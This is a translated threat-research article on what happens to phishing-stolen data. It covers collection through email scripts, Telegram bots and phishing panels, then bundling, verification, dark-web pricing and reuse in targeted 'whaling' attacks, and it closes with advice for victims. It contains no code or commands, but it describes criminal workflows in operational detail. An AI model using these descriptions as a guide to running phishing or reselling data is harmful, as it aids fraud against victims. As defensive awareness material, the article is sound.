Author: Olga Altukhova
Editor: far@Centreless

Translation: Centreless X(Twitter)@Tocentreless

Typical phishing attacks usually involve users clicking on a fraudulent link and entering their credential information on a spoofed website. However, the attack is far from over at this point. Once confidential information falls into the hands of cybercriminals, it immediately becomes a commodity, entering the "production line" of the dark web market.

In this article, we will trace the flow of stolen data: from collection through various tools (such as Telegram bots and advanced management panels) to the sale of the data and its subsequent use in new attacks. We will explore how previously leaked usernames and passwords are integrated into vast digital profiles and why even data breaches from years ago can still be exploited by criminals to carry out targeted attacks.

Data Collection Mechanisms in Phishing Attacks

Before tracking the subsequent whereabouts of stolen data, we need to understand how this data leaves the phishing page and reaches the hands of cybercriminals.

Through the analysis of real phishing pages, we identified the following most common data transmission methods:

• Sent to an email address
• Sent to a Telegram bot
• Uploaded to a management panel

It is worth mentioning that attackers sometimes use legitimate services for data collection to make their servers harder to detect. For example, they might use online form services like Google Forms or Microsoft Forms. Stolen data may also be stored on GitHub, Discord servers, or other websites. However, for the sake of this analysis, we will focus on the aforementioned primary data collection methods.

Email

The data entered by victims in the HTML form of the phishing page is sent to the attacker's server via a PHP script, which then forwards it to an email address controlled by the attacker. However, due to various limitations of email services—such as delivery delays, the possibility of hosting providers blocking the sending server, and the inconvenience of handling large amounts of data—this method is gradually decreasing.

Phishing kit contents

For example, we analyzed a phishing kit targeting DHL users. The index.php file contains a phishing form designed to steal user data (in this case, email addresses and passwords).

Phishing form imitating the DHL website

The information entered by the victim is then sent to the email address specified in the mail.php file via a script in the next.php file.

Contents of the PHP scripts

Telegram Bots

Unlike the aforementioned method, the script using Telegram bots specifies a Telegram API URL containing the bot token and corresponding chat ID instead of an email address. In some cases, this link is even hardcoded directly into the phishing HTML form. Attackers design detailed message templates that are automatically sent to the bot after successfully stealing data. A code example is as follows:

Code snippet for data submission

Compared to sending data via email, using Telegram bots provides phishers with stronger capabilities, making this method increasingly popular. Data is transmitted in real-time to the bot, immediately notifying the operator. Attackers often use disposable bots, which are harder to track and ban. Additionally, their performance does not depend on the quality of the phishing page hosting service.

Automated Management Panels

More sophisticated cybercriminals use specialized software, including commercial frameworks like BulletProofLink and Caffeine, typically offered as "Platform as a Service" (PaaS). These frameworks provide a web interface (dashboard) for phishing activities, facilitating centralized management.

All data collected from phishing pages controlled by attackers is aggregated into a unified database, which can be viewed and managed through their account interface.

Sending data to the administration panel

These management panels are used to analyze and process victim data. Specific functionalities vary based on panel customization options, but most dashboards typically have the following capabilities:

• Real-time statistical classification: View the number of successful attacks by time and country, with data filtering support
• Automatic validation: Some systems can automatically verify the validity of stolen data, such as credit card information or login credentials
• Data export: Supports downloading data in various formats for later use or sale

Example of an administration panel

Management panels are key tools for organized cybercrime groups.

It is noteworthy that a single phishing operation often employs multiple data collection methods simultaneously.

Types of Data Sought by Cybercriminals

The data stolen in phishing attacks varies in value and use. In the hands of criminals, this data serves as both a means of profit and a tool for executing complex multi-stage attacks.

Based on usage, stolen data can be categorized into the following types:

• Immediate monetization: Directly selling raw data in bulk or immediately stealing funds from the victim's bank account or e-wallet

1. Bank card information: Card number, expiration date, cardholder name, CVV/CVC code
2. Online banking and e-wallet accounts: Login names, passwords, and one-time two-factor authentication (2FA) codes
3. Accounts linked to bank cards: Login credentials for online stores, subscription services, or payment systems like Apple Pay/Google Pay

• Used for subsequent attacks to further monetize: Using stolen data to launch new attacks for additional profit

1. Various online account credentials: Usernames and passwords. Notably, even without a password, an email or phone number used as a login name holds value for attackers
2. Phone numbers: Used for phone scams (e.g., to obtain 2FA codes) or phishing via instant messaging applications
3. Personal identification information: Full name, date of birth, address, etc., often used for social engineering attacks

• Used for targeted attacks, extortion, identity theft, and deep forgery

1. Biometric data: Voice, facial images
2. Scanned personal documents and numbers: Passports, driver's licenses, social security cards, taxpayer identification numbers, etc.
3. Selfies with identification: Used for online loan applications and identity verification
4. Corporate accounts: Used for targeted attacks against businesses

We analyzed phishing and scam attacks that occurred from January to September 2025 to determine the types of data most commonly targeted by criminals. The results showed that 88.5% of attacks aimed to steal various online account credentials, 9.5% targeted personal identification information (name, address, date of birth), and only 2% focused on stealing bank card information.

Selling Data on the Dark Web Market

In addition to being used for real-time attacks or immediate monetization, most stolen data is not immediately utilized. Let’s take a closer look at its flow path:

1. Data Bundling for Sale

Once data is aggregated, it is sold in the dark web market in the form of "data dumps"—these compressed packages typically contain millions of records from various phishing attacks and data breaches. A data dump can sell for as little as $50. The main buyers are often not active scammers but dark web data analysts, who are the next link in the supply chain.

2. Classification and Verification

Dark web data analysts filter the data by type (email accounts, phone numbers, bank card information, etc.) and run automated scripts for verification. This includes checking the validity of the data and its potential for reuse—for example, whether a set of Facebook account passwords can also log into Steam or Gmail. Since users tend to use the same password across multiple sites, data stolen from a service years ago may still be applicable to other services today. Accounts that have been verified and can still log in fetch a higher price when sold.

Analysts also correlate and integrate user data from different attack events. For instance, an old social media leaked password, login credentials obtained from a spoofed government portal phishing form, and a phone number left on a scam website may all be compiled into a complete digital profile of a specific user.

3. Selling in Specialized Markets

Stolen data is typically sold through dark web forums and Telegram. The latter is often used as an "online store," showcasing prices, buyer reviews, and other information.

Offers of social media data, as displayed in Telegram

Account prices vary widely, depending on various factors: account age, balance, linked payment methods (bank cards, e-wallets), whether two-factor authentication (2FA) is enabled, and the reputation of the service platform. For example, an e-commerce account linked to an email, with 2FA enabled, a long usage history, and a large number of order records, will sell for a higher price; for gaming accounts like Steam, expensive game purchase records will increase their value; while online banking data involving high-balance accounts from reputable banks will command a significant premium.

The table below shows examples of various account prices found on dark web forums as of 2025*.

4. High-Value Target Selection and Targeted Attacks

Criminals particularly focus on high-value targets—users who possess important information, such as corporate executives, accountants, or IT system administrators.

An example of a "whaling" attack scenario: Company A experiences a data breach that includes the information of an employee who previously worked there and is now an executive at Company B. The attackers analyze open-source intelligence (OSINT) to confirm that this user is currently employed at Company B. They then carefully forge a phishing email that appears to come from the CEO of Company B and send it to the executive. To enhance credibility, the email even references some facts about the user from their previous company (of course, the attack methods go beyond this). By lowering the victim's vigilance, the criminals have the opportunity to further infiltrate Company B.

It is important to note that such targeted attacks are not limited to the corporate sector. Attackers may also target individuals with high bank account balances or users holding important personal documents (such as those required for micro-loan applications).

Key Insights

The flow of stolen data operates like an efficiently running assembly line, with each piece of information becoming a commodity with a clear price tag. Today's phishing attacks widely employ diverse systems to collect and analyze sensitive information. Once data is stolen, it quickly flows into Telegram bots or the attacker's management panel, where it is classified, verified, and monetized.

We must be acutely aware that once data is leaked, it does not simply disappear. Instead, it is continuously accumulated and integrated, and may be used for targeted attacks, extortion, or identity theft months or even years later. In today's cyber environment, remaining vigilant, setting unique passwords for each account, enabling multi-factor authentication, and regularly monitoring one's digital footprint is no longer a suggestion but a necessity for survival.

If you unfortunately become a victim of a phishing attack, please take the following actions:

1. If your bank card information is leaked, immediately call the bank to report and freeze the card.
2. If account credentials are stolen, immediately change the password for that account and also update the passwords for all other online services that use the same or similar passwords. Be sure to set a unique password for each account.
3. Enable multi-factor authentication (MFA/2FA) on all supported services.
4. Check the login history of your accounts and terminate any suspicious sessions.
5. If your instant messaging or social media accounts are compromised, immediately notify friends and family to warn them about fraudulent messages sent in your name.
6. Use professional services (such as Have I Been Pwned) to check if your data has appeared in known data breaches.
7. Remain highly vigilant about any unexpected emails, phone calls, or promotional offers—if they seem credible, it is likely because attackers are leveraging your leaked data.

免责声明：本文章仅代表作者个人观点，不代表本平台的立场和观点。本文章仅供信息分享，不构成对任何人的任何投资建议。用户与作者之间的任何争议，与本平台无关。如网页中刊载的文章或图片涉及侵权，请提供相关的权利证明和身份证明发送邮件到support@aicoin.com，本平台相关工作人员将会进行核查。